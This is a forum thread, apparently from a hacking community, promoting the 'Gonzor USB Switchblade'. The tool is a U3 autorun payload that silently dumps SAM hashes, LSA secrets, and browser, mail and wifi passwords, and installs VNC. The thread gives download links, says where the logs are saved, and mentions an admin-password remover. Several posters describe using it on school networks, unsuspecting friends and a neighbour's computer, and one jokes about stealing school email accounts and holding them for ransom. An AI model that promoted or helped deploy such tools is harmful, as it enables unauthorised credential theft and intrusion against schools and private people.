U3 Usb Drives

Ok well im back :D i did a service to the community and i got off for good behavior. I survived. And im trying to live up to everyone expectations of coming back with something huge. Well yeh ive got one. Physical intrusion is often over looked by hackers. It is more dangerous then u all believe. Gonzor a friend of mine has been working on a project called "gonzor usb switchblade" basically upon inserting the usb it dumps all sorts of personal data. Here is wat the most basic and public version dumps. * Dump System Info * Dump Network Services * Dump Port Scan * Dump Product Keys * Dump SAM * Dump Wifi Hex * Dump Network Passwords * Dump Cache * Dump Messenger Passwords * Dump Firefox Passwords * Dump IE Passwords * Dump Mail Passwords * Dump LSA secrets * Dump Updates-List * Dump URL History * Dump External IP * Install VNC * Install HakSaw All of this is done silently and in a matter of 45 seconds. All it takes is for me to plug the usb device in and sit there nothing has ot be clicked. Thats his exploit its a combination of hacksaw and milions of other apps. I am making a video for the community on how to secure against this. Peace

"Physical intrusion is often over looked by hackers. It is more dangerous then u all believe."

I totally agree with you SANTA. I think that Physical intrusion can be the easiest and some ways the hardest way to intrude into a network.

I think you are doing a service to the community. But, anyway, please create a version with the "install hacksaw" removed, for stealth reasons.

yeh easy to do jsut go back to version 1.1 those new ones are only in number 2. but im glad someoen can level with me

Can you post a link?

I tried the link in your profile, but it didn't work. Oh and about Bravenet's forums, they are subject to HTML and I think Javascript injections. (So someone could theoretically inject annoying audio clips, or worse)

sweet! I hate U3, it autoinstalls, and I was just thinking "someone oughta write a U3-like rootkit." It shouldnt be that hard even for a novice programmer because U3 distributes an sdk. Yeah, SANTA, where can we get this? This looks like an awesome project… I've been getting tons of portable apps to try to get some passes to my school's network (we actually have a competent admin :( ) and this looks perfect. Way better than having the teach looking over my shoulder and screaming ommfg wdf r u doingQ?

If you need any testers, pm me, I have time (and an old box in my room) to kill :D

lol im making a video on it as we speak.

Awesome to see you back SANTA… also this U3 project… i've a coupla drives and a whole school that i see once a day.(only for a block then its back to another school) and i think this is something fun we could play with ^_-

i agree with that. the video is up its pretty crappi. I will make a better one but this is jsut to demonstrate the power and let some of you get out there and use it.

aight where is said video? i'd like to see it.. but dunno where to look =\

add me on msn lil_bro_92@hotmail.com

aight ^_- done :P

Sweat! Does this work on every computer? Or just some?:ninja:

And you didn't post a public link because…?

Anyway, how did you do it? You got the source of every program in your list and recoded so the process is fully automated? Can I see the vid? (I am not posting my e-mail here, PM or something).

When you release it will it be open-source or "just" the exe? Anyways, welcome back I guess.

Does this work if u insert it and hold down shift to disable autorun? Cus i'd like to give it to someone but some of my "friends" are rather cautious, though I doubt none even know how to do that. Also, does it save the stuff as hidden files? Because if he saw "password info" create itself while the stick is in the comp, he'd probably get suspicious and smash the thing…

:p and where's this video? I checked out ur site but you havent posted it there… I'd also like whatever stable version you have, too, as school's back in :p

BTW… nice name for it! and good luck with future versions.

Welcome back

ok basically. yes its open source so you can view the source if you dont trust santa clauss. no shift key wont stop it. muhahaha lol thanks for the compliment on the name. but you should really compliment gonzor the video will be on hbh soon. its huge though so im thinking of jsut making anohterone tonight of jsut me installing it and using it. but no need for an installation guide for you guys basiccally cause its piss easy.

http://rapidshare.com/files/48697935/hbhvodcast.zip

im downloading the vid now :D if it does what you say it does then i bow down to your skills at programming as it sounds fucking awesome!!!!

it will go on my security pendrive :P

i havnt downloaded the vid yet so i might be asking a stupid question but does it somehow alert you to when its done like make a beep or a little popup saying its done or something

[edit] i cant hear your voice over the sound of the music because this laptop has crap speakers, do you have a version with the music not as loudQ [/edit]

Where to download the program, Santa?

for everybody out there this is NOT new!

this has been discussed in depth see hak5.org

if you care to look at the forums there is a LOT of information on this. http://forums.hak5.org/index.php?PHPSESSID=rfnnc18kqhcmrgul0ll3u7ugr4&board=20.0

also I am NanoyMaster and I am using this account as my other is borked.

I happen to have a U3 sandisk and neither system_meltdown or cheese hesitated when they (yes they) put it in their computers. I guess they didn't know about the tech. luckily for them I have the switchblade turned off.

I recomend it for anyone as it is only £15 for a 2 gig one w00t http://www.lowpricememory.co.uk/flash.html

enjoy

SO… um, SANTA, you gonna give us a dl link to it or what? I'd REALLY REALLY REALLY like to get some stuff off the school comps :p

also, does it work with vista? I would think so, since it's basically xp with too much eye candy and less functionality :\

but idk what M$ changed with this OS, except that they use it at school now and it sucks

and, again, sweet stuffs!

ah, SANTA, you use objectdock. kewl, me too lol… l was just wondering… kind of random, how do you change your system's icons (like for folders, etc) just for your user without manually editing registry? I can do it for a single one but idk how to do them all…

oh, and here's the url to the site switchblade's posted on, in case anyone was wondering. It's the first result on Google for "gonzor switchblade"

http://www.users.on.net/~simmo_89/switchblade/download.html

OK, and this has to be U3? I guess I'll install U3 on one of my old flash drives I dont use much anymore, just as a switchblade drive I guess, since I am NOT going to reinstall U3 on my main drive. I use portable apps, waaaay better than u3.

Not finished yet, will update on progress.

Ach, it has to be a "u3 smart drive"

My main one is u3 but this one is not… is there a way you can manually set u3 to be inactive until you manually activate it? It is soooo annoying, i would classify it with windows preload bugware.

nvm, sorry, stupid moment… autorun rofl, how could I forget?

w00t! it works, sweet!

oh, SANTA?

This writes nothing to the host computer's HD if the install options are unchecked, right?

um.. last I heard, the switchblade writes hidden files to the host computer. the antidote is on the hak5 website.

-Bl4ckC4t

k ill check that out, cuz my dad gets very paranoid when he finds odd stuff… even tho he knows about 2% of what goes on in the comp :p

and, your sig… who is ImperfectTruth? and is he dead… about the only way to rm-rf / a person, right…? Forgive my blissful ignorance, respects to IP

First of all, how do I retrieve the files? And secondly, I ran it on my main system (stupid me :() and i want to antidote it.

google "switchblade payload antidote", the first thing, if I remember correctly, is the anti. Once you remove the drive, though, you're ok. Antivir won't detect anything left there.

As to how to find the files, they will be in [flash partition drive letter]:\System\Logs\COMPUTERNAME\

I don't yet know how to get the SAMs and all that… maybe santa will tell us

[edit] I just ran the SB a second time, this time it dumped everything (first time log was only 4kb long, this time 120! Only useful stuff I got was my yahoo email account info. It wouldn't dump the sam, though I'm an admin on a win XP system (xp pro 2002/ 2005 media center edition). Maybe its MCE because it is not regular xp? I've got XP dual-booting on the crappy old serverlicious box in my room, maybe I'll try this on it…

Anyway, this thing's marvelous, but I don't really have any need for it. School comps are never admin, we got a good IT guy, and so it won't work there… or will it? I'll try in engineering tomorrow, we have a network of laptops in there. Anyway, this thing rocks. Good work SANTA, gonzor, and everyone else who worked on this. The thing owns.

ok, post is long enough.

[/edit]

Do you need Admin to get it to run?

I think you need admin for a lot of the items it requests, or u just wont get them, but I don't think you need admin to actually execute the thing itself. It'll probably get you a few things, like tcp/ip and such, but not SAMs or anything like that. I'm going to try @ school tomorrow 'n see if I can get email passes. We use SquirrelMail, mebbe I can steal some accounts and ransom them :p

lol last i heard it didnt write anything as long as you dont tell it to install anything on the computer. so if install vnc and hacksaw are off. then no trace :D Yes this is not new at all. switchblades have been around for ages. but all the others are nothing like gonzors the link is on the video. and i will be removing the music soon enough because yeh i cant hear me either :P yay community points for it :D btw just add me on msn for any questions or pm me lil_bro_92@hotmail.com be watching the site because v3.0 introduces the vnc fix and a few more features :D

oh and thor i have the admin problem being sorted out as we speak. im not the greatest of hackers but i know lots of people and an iranian friend of mine whipped up a program in delphi that removes the xp admin password for you without needing to know the old one. well yes wen incorporated with switchblade… bingo lol i got a 8 megabyte log file off my skool because network dump was on :D and yes my admin are smart… but im smarter :D

I just need a way to run the stuff as admin, or not require admin. If I remove admin pass then the IT department gets suspicious… unless I do it on a neighbor's comp :p

but then everyone in the school knows I'm the computer guy. Need something fixed, call me. Blame someone for something, it's me. haha.

So if in some future version you can dump all this stuff without an admin account it would be awesome, cuz i dont wana get suspended lol. Never even had a detention for anything!

I get so sick and tired of the blocks at school… it's not like I'm a hacker or anything, is it? ;)

Basically, what I'm getting at, I think a good goal for version 3 at least should be running, obtaining the info without an admin account, and not moditying (including removing passes, etc) stuff from the host. Literally plug 'n play. I've never heard of anything that totally bypasses admin restrictions without modifying admin account though…

Oh, and random question to anyone? Is it possible to view windows registry on an HD? I have no idea where it's stored… it'd just be a cool thing to know.

BTW this is all gonzors. Not mine. I have not contributed code. Except like one idea tops. Just wanted to show you guys this. AS its the begginging of a saga on physical intrusion im making for HBH.

Soz for ouble post dunno how it happened

the sb won't run on Vista @ school, that's where I'm posting from now. Student accounts are not admin, and it blocks unregistered security certificate software from running without admin pass. damn… maybe it'll run on the few xp's left. I'm gonna go try to convince the admin to move back to xp though :p because VISTA FREAKIN SUCKS! It hogs up 600m of my 1gb ram here, just SITTING STILL! Oh, well, still got my good 'ol portable apps so I don't have to use stupid ms office 07…

ciao